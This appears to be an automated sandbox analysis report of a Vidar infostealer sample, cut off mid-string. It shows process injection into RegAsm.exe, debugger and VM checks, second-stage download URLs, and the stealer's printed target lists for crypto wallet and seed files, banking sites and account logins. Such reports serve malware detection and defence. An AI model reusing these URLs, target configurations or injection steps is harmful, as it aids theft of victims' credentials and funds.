                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1218739|https://dbsmena.com/ljhgfsd.exe|1|kkkk|1218740|https://dbsmena.com/vdshfd.exe|1|kkkk|
                        Source: FCAAEB.2.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                        Source: FCAAEB.2.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                        Source: FCAAEB.2.drBinary or memory string: global block list test formVMware20,11696428655
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: R1218739https://dbsmena.com/ljhgfsd.exe1kkkk1218740https://dbsmena.com/vdshfd.exe1kkkk783966f7e54258
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: https://dbsmena.com/ljhgfsd.exe?
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000134D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: FCAAEB.2.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                        Source: FCAAEB.2.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                        Source: RegAsm.exe, 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: }Whttps://dbsmena.com/ljhgfsd.exea; boundary=----FBKJDGCGDAAAKECAKKJDen"
                        Source: FCAAEB.2.drBinary or memory string: AMC password management pageVMware20,11696428655
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: mT1218739|https://dbsmena.com/ljhgfsd.exe|1|kkkk|1218740|https://dbsmena.com/vdshfd.exe|1|kkkk|5jb20vdmRzaGZkLmV4ZXwxfGtra2t8ECBGCAAAAFC
                        Source: FCAAEB.2.drBinary or memory string: tasks.office.comVMware20,11696428655o
                        Source: RegAsm.exe, 00000002.00000002.3293998119.00000000012EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwarec
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: https://dbsmena.com/ljhgfsd.exe
                        Source: FCAAEB.2.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                        Source: FCAAEB.2.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                        Source: FCAAEB.2.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                        Source: RegAsm.exe, 00000002.00000002.3293998119.00000000012EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                        Source: RegAsm.exe, 00000002.00000002.3298534442.0000000012C7D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\ljhgfsd[1].exe
                        Source: FCAAEB.2.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: Thttps://dbsmena.com/ljhgfsd.exeent-Disposition: form-data; name="token"
                        Source: FCAAEB.2.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                        Source: RegAsm.exe, 00000002.00000002.3293998119.00000000012EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW J5
                        Source: FCAAEB.2.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                        Source: FCAAEB.2.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                        Source: FCAAEB.2.drBinary or memory string: discord.comVMware20,11696428655f
                        Source: FCAAEB.2.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                        Source: FCAAEB.2.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                        Source: FCAAEB.2.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                        Source: RegAsm.exe, 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: ]Vhttps://dbsmena.com/ljhgfsd.exe OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.016d1cfe27783966f7e54258
                        Source: RegAsm.exe, 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: Whttps://dbsmena.com/ljhgfsd.exefCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyvchost.exe
                        Source: RegAsm.exe, 00000002.00000002.3293998119.00000000013D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /ljhgfsd.exe
                        Source: FCAAEB.2.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                        Source: FCAAEB.2.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                        Source: FCAAEB.2.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                        Source: FCAAEB.2.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                        Source: FCAAEB.2.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: Uhttps://dbsmena.com/ljhgfsd.exeent-Disposition: form-data; name="token"
                        Source: FCAAEB.2.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                        Source: FCAAEB.2.drBinary or memory string: outlook.office.comVMware20,11696428655s
                        Source: FCAAEB.2.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                        Source: FCAAEB.2.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                        Source: RegAsm.exe, 00000002.00000002.3293998119.00000000013D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: FCAAEB.2.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                        Source: FCAAEB.2.drBinary or memory string: dev.azure.comVMware20,11696428655j
                        Source: FCAAEB.2.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: https://dbsmena.com/ljhgfsd.exe)
                        Source: FCAAEB.2.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_2-78757
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_2-78773
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_2-80097
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0041D016
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00418950
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004014AD mov eax, dword ptr fs:[00000030h]2_2_004014AD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040148A mov eax, dword ptr fs:[00000030h]2_2_0040148A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004014A2 mov eax, dword ptr fs:[00000030h]2_2_004014A2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00418599 mov eax, dword ptr fs:[00000030h]2_2_00418599
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041859A mov eax, dword ptr fs:[00000030h]2_2_0041859A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040884C CopyFileA,GetProcessHeap,RtlAllocateHeap,StrCmpCA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA,DeleteFileA,2_2_0040884C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0041D016
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0041D98C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042762E SetUnhandledExceptionFilter,2_2_0042762E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0CB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6C0CB66C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0CB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6C0CB1F7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C27AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6C27AC62
                        Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Yara detected Powershell download and execute
                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 6128, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6508, type: MEMORYSTR
                        .NET source code references suspicious native API functions
                        Source: file.exe, Program.csReference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
                        Source: file.exe, Program.csReference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
                        Source: file.exe, Program.csReference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
                        Allocates memory in foreign processes
                        Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Contains functionality to inject code into remote processes
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02FE2131 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_02FE2131
                        Injects a PE file into a foreign processes
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                        Searches for specific processes (likely to inject)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_004124A8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_0041257F
                        Writes to foreign memory regions
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: FCD008Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040111D cpuid 2_2_0040111D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,2_2_00410DDB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_0042B0CC
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,2_2_0042B1C1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,2_2_00429A50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,2_2_0042B268
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,2_2_0042B2C3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,2_2_0042AB40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,2_2_004253E3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,2_2_0042B494
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,2_2_0042749C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesA,2_2_0042B556
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,2_2_00429D6E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,2_2_0042E56F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_00427576
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_00428DC4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_0042B5E7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_0042B580
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,2_2_0042B623
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,2_2_0042E6A4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041C0E9 lstrcpyA,GetLocalTime,SystemTimeToFileTime,2_2_0041C0E9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00410C53 GetProcessHeap,HeapAlloc,GetUserNameA,2_2_00410C53
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,2_2_00410D2E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: RegAsm.exe, 00000002.00000002.3293998119.00000000012EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Vidar
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Yara detected Vidar stealer
                        Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.3fe5570.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.3fe5570.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.2060446715.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 6128, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6508, type: MEMORYSTR
                        Found many strings related to Crypto-Wallets (likely being stolen)
                        Source: RegAsm.exe, 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: *,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|DESKTOP|%DESKTOP%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia 